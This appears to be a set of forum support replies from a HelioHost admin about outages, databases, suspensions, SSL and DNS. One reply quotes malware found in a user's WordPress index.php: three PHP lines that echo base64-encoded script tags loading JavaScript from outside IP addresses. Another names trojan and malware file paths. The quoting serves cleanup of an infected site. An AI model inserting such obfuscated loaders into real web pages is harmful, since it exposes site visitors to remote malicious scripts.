Krydos

Deployed. http://softlab.heliohost.org/REWeb

Would you like me to ask the attackers nicely to stop? Stevie was running fine through it all, and actually had ridiculously low load because the network was so congested that he didn't have any pages to serve or any scripts to process. When a gap in the attack would occur all 100,000 or whatever people smashing their refresh button would suddenly come through all at once, and the load would spike up a bit as Stevie finally had something to do. Thanks for pointing this out. I hadn't noticed and I'll have ns1 back up asap. If anyone knows why someone would want to ddos us I'm listening, but that's why these attacks are so stupid. What's the point? What did Heliohost do to upset you? Is it just one website that you don't like? Lack of communication just makes it that much funnier. Whatever. Trolls thrive on seeing that they have caused people to be upset. The best medicine to combat a troll is to not be upset and just ignore them so they will go bother someone else.

The account mrobo has been deleted.

The database fairtrek_ft should now be visible to your root mysql account. You may need to delete, recreate, and reassign permissions to any database users that should have access to the affected database. If phpmyadmin doesn't log in properly or you don't see the database there change your account password and this should sync up the mysql/cpanel passwords. Let us know if you're still having any issues accessing your data.

Fixed. Thanks for reporting this.

I have unsuspended your account, but left your website suspended so your malware files can't be accessed by a browser. You need to log in, backup your account if there's any content you want to try to keep, and then delete everything. Let us know if you need further assistance.

Deployed. http://messagehide.in/hidemessage/

Your high load is being caused by /home1/masami/public_html/index.php You've got some interesting looking malware injected into your wordpress site... <?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzUuMTU3LjU0LjEzL2pxdWVyeS5qcyI+PC9zY3JpcHQ+"); ?> <?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzQ1LjM0LjEwMy42OS9pbWFnZXMvd3AtbG9nby5qcyI+PC9zY3JpcHQ+"); ?> <?php echo base64_decode("PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovLzE4NC4xMDUuMjAzLjE4L2ltYWdlcy93cC1sb2dvLmpzIj48L3NjcmlwdD4="); ?> <?php /** * Front to the WordPress application. This file doesn't do anything, but loads * wp-blog-header.php which does and tells WordPress to load the theme. * * @package WordPress */

Here is the error that importing that file gives: Locale XML Upload Importing 'it.yaml'. The file does not contain well formed XML according to '/usr/bin/xmlwf'. The link you provided says it supports cPanel/WHM 11.52 so maybe they changed the language format from xml to yaml recently. I can try again once we upgrade cPanel.

A link to your database mrobo_ekostav backup has been PMed to you. Unfortunately the mysqldump command wasn't able to make a .sql file dump for you, possibly because the database was too large. That's why it wasn't located in your full backup. Let us know if you need further assistance.

Can you connect to your site now? You had 76 connections at once from your IP and Stevie blocked you as a DoS attack. I've removed the block.

The databases listed should now be visible to your root mysql account. You may need to delete, recreate, and reassign permissions to any database users that should have access to the affected databases. If phpmyadmin doesn't log in properly or you don't see the database there change your account password and this should sync up the mysql/cpanel passwords. Let us know if you're still having any issues accessing your data.

I have removed the suspension on your site. Make sure it's clean, and it stays clean please. Let us know if you have any questions.

What database?

If it's a configuration error why does SSL work for everyone other than you? Yes, apache is "doing" SSL on port 443. Sure. Looks good. The other 40 or so accounts using SSL (myself included) think it looks good too.

Your account has been set to paper_lantern. Well, you'll have to talk to cPanel about this or provide the translations for us yourself because I certainly don't speak Italian.

You password has been reset, tested, and emailed to your contact email address.

That error looks like you generated your letsencrypt certificate wrong. I found this on the letsencrypt website documentation. Try this: https://community.letsencrypt.org/t/howto-a-with-all-100-s-on-ssl-labs-test-using-apache2-4-read-warnings/2436

Flush your dns and your page should be working now.

Our antivirus scanner shows /home1/metals/public_html/iloveheavymetal.tk/wp-admin/images/libworker.so: Unix.Trojan.Roopre FOUND and I found /home1/metals/public_html/iloveheavymetal.tk/wp-content/themes/designzmagilhm22/help.php which looks like malware to me. You should probably delete your whole site, reinstall, and restore your content from a backup. I have unsuspended your cpanel, but left your site on the suspended page. This way you can log in and clean everything up without the hackers being able to connect to their malware files to send spam through your account. Let us know when you're done cleaning everything up.

Deployed. http://softlab.heliohost.org/REWeb

Set your nameservers to ns1.heliohost.org and ns2.heliohost.org http://bybyron.net/php/tools/dns_records.php?domain=codesays.com&rec=NS

It takes up to 24 hours to switch just like everything else DNS or domain related.

Dedicated IP granted.

Deployed. http://messagehide.in/hidemessage